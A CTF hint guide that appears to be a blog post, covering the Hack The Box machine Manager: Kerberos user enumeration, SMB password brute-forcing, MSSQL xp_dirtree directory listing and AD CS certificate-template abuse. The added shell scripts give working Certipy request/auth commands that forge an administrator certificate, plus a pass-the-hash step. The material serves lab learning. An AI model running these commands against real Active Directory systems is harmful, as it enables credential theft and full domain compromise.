Introduction
This section aims to provide guided support to aspiring cyber security learners who are finding their way around Capture The Flag (CTF) challenges on platforms like Hack The Box, TryHackMe, PicoCTF or HackerOne.
This is not a complete walkthrough or writeup but a sneak peek at how to capture the flag on these machines, based on the attack/exploit methods and tools required.
This gives learners guided support while keeping them from depending entirely on writeups, so they learn new skills by applying themselves.
So, let's get started with a sneak peek at the Hack The Box machine Manager.
Learnings
- Kerberos User Enumeration
- SMB Credentials Brute-Force using CrackMapExec
- MSSQL Command Execution
- Active Directory Certificate Services (AD CS) Exploitation
Tools Used
- Nmap
- Kerbrute
- CrackMapExec
- Impacket
- Certify
- Certipy-ad
- Evil-WinRM
Methods/Techniques
- Credential Brute-Forcing (Dictionary Attack)
- Stored Procedure Command Execution
- Active Directory Certificate Services - Custom Template Exploit
- Pass The Hash
Reference/Reading Material
- https://www.patrickkeisler.com/2012/12/how-to-use-xpdirtree-to-list-all-files-part2.html
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://www.hackthebox.com/blog/cve-2022-26923-certifried-explained
- https://github.com/ly4k/Certipy/blob/main/README.md
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
- https://www.digitalocean.com/community/tutorials/how-to-set-up-time-synchronization-on-ubuntu-20-04
Summary
We start with simple port and service enumeration and find many useful open ports indicating a Windows machine. We move forward with web directory enumeration, but it yields little.
How do we know what to do?
With each CTF/challenge, I keep updating my approach, or you may say my learning plan. I keep an Excel file (for now) to remember:
- What to do when I come across a certain port or a certain situation?
- What tools to use?
- What technique/method to apply?
So, I know from previous experience that whenever I see port 88 (Kerberos) open, I should try user enumeration with Kerbrute, and when a username is found, always try the default "password" or a password identical to the username. We need to keep trying. Sometimes you are lucky and sometimes you are not.
Might help...
We find SMB open but are not able to list or mount any shares with the access we have. We move ahead with Kerberos user enumeration and find some valid users.
Foothold
We have users and can try to brute-force their credentials. I tried Hydra but for some reason was unable to make it work. We have another wonderful tool, CrackMapExec, and you can try a default password list to brute-force a password for the given users (or try to be lucky with the username-as-password guess).
In any case, you end up with two users with passwords, and we also have a database port (MSSQL) open in the Nmap report. If you have a client for that database you can try it; otherwise Impacket also ships a client tool for it (mssqlclient.py). Just try --help with the script; it shows how to authenticate to the database (use Windows authentication for a domain account) and gives you a database prompt.
User
Now, again Google can help us move forward: we don't find any useful information in the database itself, so how can we exploit the database prompt? We know that MSSQL lets us call stored procedures that reach outside the database (listing the filesystem, for instance) if it is not configured properly.
Find the stored procedure that lets us list a directory (see the xp_dirtree reference above) and use it to search the Windows root directory for the web application's folder.
You will find an interesting file; just fetch it with wget via the web server and go through its contents. You will get your user's credentials, and once logged in you have your user flag.
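As an added example (not the post's own commands), here is how the directory-listing step above can be scripted instead of typed into the prompt: it builds xp_dirtree calls, escapes the path correctly for a T-SQL string literal, and runs the batch non-interactively through Impacket's mssqlclient.py. Assumed, and not stated on the page: the IIS default web root C:\inetpub\wwwroot as the place to look, domain credentials in $DOMAIN/$USER_/$PASS, the target in $TARGET, and an Impacket release whose mssqlclient.py supports the -file option.

```shell
#!/usr/bin/env bash
# Added example (not from the original post). Assumed env: DOMAIN, USER_, PASS, TARGET.

# sql_quote STR: double every single quote so STR is safe inside a T-SQL '...' literal
sql_quote() { printf '%s' "$1" | sed "s/'/''/g"; }

# dirtree_query PATH [DEPTH]: T-SQL for xp_dirtree. Arguments are path, depth
# (1 = direct children only, 0 = recurse fully) and a flag that, set to 1, lists
# files as well as directories (by default only directories come back).
dirtree_query() {
    printf "EXEC master.sys.xp_dirtree '%s', %s, 1;\n" "$(sql_quote "$1")" "${2:-1}"
}

# dirtree_batch PATH...: one query per path, e.g. the usual starting points for
# locating a web application on a Windows host.
dirtree_batch() {
    for p in "$@"; do dirtree_query "$p" 1; done
}

# run_dirtree PATH...: write the batch and execute it. -windows-auth because the
# login here is a domain account rather than a SQL-native one.
run_dirtree() {
    dirtree_batch "$@" > dirtree.sql
    mssqlclient.py -windows-auth "$DOMAIN/$USER_:$PASS@$TARGET" -file dirtree.sql
}

# Example: run_dirtree 'C:\' 'C:\inetpub' 'C:\inetpub\wwwroot'
```

xp_dirtree only lists; it does not read file contents. Anything of interest found under the web root is fetched the way the post describes, over HTTP with wget, because the web server is already serving that directory.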
Root
As per our standard procedure for Windows privilege escalation, we need to check which privileges and group memberships our user has.
We can see one specific privilege related to Active Directory Certificate Services. There is only one interesting vulnerability to be found on the web related to this privilege, and all we have to do is find the vulnerable template.
The certificate tools listed above (Certify, Certipy) can help us find the vulnerable template, and the HackTricks pages can help further to execute our exploit.
Some explanation and some cheating; your decision.
We need to list all available templates and find the one that is vulnerable. If you use the tool's direct "vulnerable" option to list templates, you may get nothing, so list every template and inspect the fields yourself.
One specific template is vulnerable for two reasons:
- msPKI-Certificate-Name-Flag is set to ENROLLEE_SUPPLIES_SUBJECT, which means the subject name (the identity the certificate will be issued for) is supplied by whoever requests the certificate. We are the requester and can supply administrator as the name, hence vulnerable. (For the certificate to be usable for logon, the template must also allow client authentication and grant our account enrollment rights.)
- Authorized Signatures Required is set to 0. This value is the number of co-signatures from designated enrollment agents a request must carry before the CA accepts it. With 0, the CA issues the certificate from our request alone; combined with no manager approval on the template, issuance is automatic rather than waiting for an administrator.
Pay attention to all the details like the DNS hostname and CA name, and enclose the password in quotes because of the special symbols in it.
Now you have your vulnerable template, DNS hostname, CA name and credentials, and all you need to do is follow the steps available on the referenced website for this specific vulnerable template and run the commands with sudo.
If you follow the commands in sequence with the correct details, you will get the administrator's certificate and private key; then use the same certificate tool's auth method to obtain the administrator's NT hash, and Impacket will let you perform a pass-the-hash attack.
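The following added example (not from the original post or from Certipy itself) shows how to triage Certipy's text output for the two template properties discussed above while also checking the conditions the post leaves implicit: the template is enabled, allows client authentication, needs no manager approval, and grants enrollment rights to a group we are in. It then chains the request, auth and pass-the-hash commands that Certipy's README documents for a template of this kind. Assumed and not on the page: env vars DOMAIN, TARGET (DC IP), CA (CA name), CA_HOST (DNS hostname of the CA), USER_ and PASS; the template names, CA name and domain in the sample are constructed and only mimic the layout of certipy find -text -stdout output.

```shell
#!/usr/bin/env bash
# Added example (not from the original post). Assumed env: DOMAIN, TARGET, CA, CA_HOST, USER_, PASS.

# vulnerable_templates GROUP_REGEX  (reads certipy text output on stdin)
# Prints templates that are enabled, let the enrollee supply the subject, need 0
# authorized signatures and no manager approval, allow client authentication, and
# grant enrollment rights to a principal matching GROUP_REGEX.
vulnerable_templates() {
    awk -F' : ' -v grp="$1" '
        function flush() {
            if (name != "" && en && es && sig == 0 && !appr && ca && rights) print name
            name = ""
        }
        /Template Name *:/                  { flush(); name = $2; en = es = ca = rights = inr = 0; sig = -1; appr = 1 }
        /^ *Enabled *:/                     { en = ($2 == "True") }
        /Client Authentication *:/          { ca = ($2 == "True") }
        /Enrollee Supplies Subject *:/      { es = ($2 == "True") }
        /Requires Manager Approval *:/      { appr = ($2 == "True") }
        /Authorized Signatures Required *:/ { sig = $2 + 0 }
        /Enrollment Rights *:/              { inr = 1 }   # principals may continue on the following lines
        / : / && !/Enrollment Rights/       { inr = 0 }   # any other key/value line ends that list
        inr && $0 ~ grp                     { rights = 1 }
        END { flush() }
    '
}

# sample_certipy_output: constructed stand-in for certipy find output (three templates,
# only the first of which a Domain User can actually enroll in).
sample_certipy_output() {
    cat <<'EOF'
Certificate Templates
  0
    Template Name                       : WebServerCustom
    Display Name                        : Web Server Custom
    Certificate Authorities             : corp-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CORP.LOCAL\Domain Users
                                          CORP.LOCAL\Domain Admins
  1
    Template Name                       : SubCA
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CORP.LOCAL\Domain Admins
      Object Control Permissions
        Owner                           : CORP.LOCAL\Enterprise Admins
  2
    Template Name                       : ApprovedUser
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CORP.LOCAL\Domain Users
EOF
}

# exploit_template TEMPLATE: request a certificate carrying the administrator UPN,
# turn it into an NT hash, then pass the hash with Impacket. Quoting "$PASS" is
# what the post means by enclosing a password that contains special symbols.
exploit_template() {
    certipy req -u "$USER_@$DOMAIN" -p "$PASS" -dc-ip "$TARGET" -target "$CA_HOST" \
        -ca "$CA" -template "$1" -upn "administrator@$DOMAIN"
    certipy auth -pfx administrator.pfx -dc-ip "$TARGET" -username administrator -domain "$DOMAIN"
    # certipy auth prints the NT hash; the LM half is left empty:
    # impacket-psexec -hashes ':<NT hash>' "$DOMAIN/administrator@$TARGET"
}

# Usage: certipy find -u "$USER_@$DOMAIN" -p "$PASS" -dc-ip "$TARGET" -text -stdout | vulnerable_templates 'Domain Users'
```

The group filter matters: SubCA in the sample has the same two properties the post describes, but only Domain Admins can enroll in it, so it is not the template to go after from a low-privileged account. Run vulnerable_templates with the groups your current user actually belongs to.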
You may face a clock skew issue
If you face this issue, it means your local clock and the target's clock are too far apart; Kerberos rejects requests when the difference exceeds its tolerance (five minutes by default), regardless of which timezone you are in.
You need to synchronise your clock with the target. You may use sudo timedatectl set-ntp 0 && sudo rdate -n <Target IP> to overcome this; disabling NTP first matters because otherwise your own time service pulls the clock back within minutes.
You have your admin console and the root flag in front of you.
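Added example (not the post's own commands): a small check that measures the clock difference against the DC before any Kerberos-dependent tool is run, and syncs only when the difference is outside the default five-minute tolerance, restoring NTP afterwards. Assumed, and not on the page: Nmap's smb2-time script as the time source, and a GNU date that accepts -d on the attacking box. The Nmap output lines in the test are constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the original post).

KRB_MAX_SKEW=300   # Kerberos default MaxClockSkew: 5 minutes, in seconds

# skew_seconds A B: absolute difference between two epoch timestamps
skew_seconds() {
    d=$(( $1 - $2 ))
    [ "$d" -lt 0 ] && d=$(( -d ))
    echo "$d"
}

# skew_ok A B: succeed when the two clocks are within tolerance
skew_ok() { [ "$(skew_seconds "$1" "$2")" -le "$KRB_MAX_SKEW" ]; }

# smb_date: pull the "date:" value out of `nmap --script smb2-time` output (stdin).
# Only the "|   date: ..." line is wanted, not "|_  start_date: ...".
smb_date() { awk '$2 == "date:" { print $3 }'; }

# check_skew HOST: compare our clock with the DC's SMB time (reported in UTC)
check_skew() {
    remote=$(nmap -p445 --script smb2-time "$1" | smb_date)
    remote_epoch=$(date -u -d "$remote" +%s)
    now=$(date +%s)
    if skew_ok "$now" "$remote_epoch"; then
        echo "skew $(skew_seconds "$now" "$remote_epoch")s: within tolerance"
    else
        echo "skew $(skew_seconds "$now" "$remote_epoch")s: sync needed"
        return 1
    fi
}

# sync_clock HOST: stop the local time service first, or it quietly drags the
# clock back; restore_clock undoes that once you are done with the box.
sync_clock()    { sudo timedatectl set-ntp false && sudo ntpdate "$1"; }   # or: sudo rdate -n "$1"
restore_clock() { sudo timedatectl set-ntp true; }
```

Typical use is check_skew "$TARGET" || sync_clock "$TARGET" before kerbrute or certipy, and restore_clock when the engagement is over so your own machine's clock does not stay pinned to the target's.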
Disclaimer
The purpose of this sneak peek is just to help you keep going in the right direction to exploit the machine, without handing you the solution directly. It helps a beginner like me execute, explore and learn more things by ourselves while having some guidance.
Yes, it takes time, but it's worth making the effort rather than depending completely on a full writeup.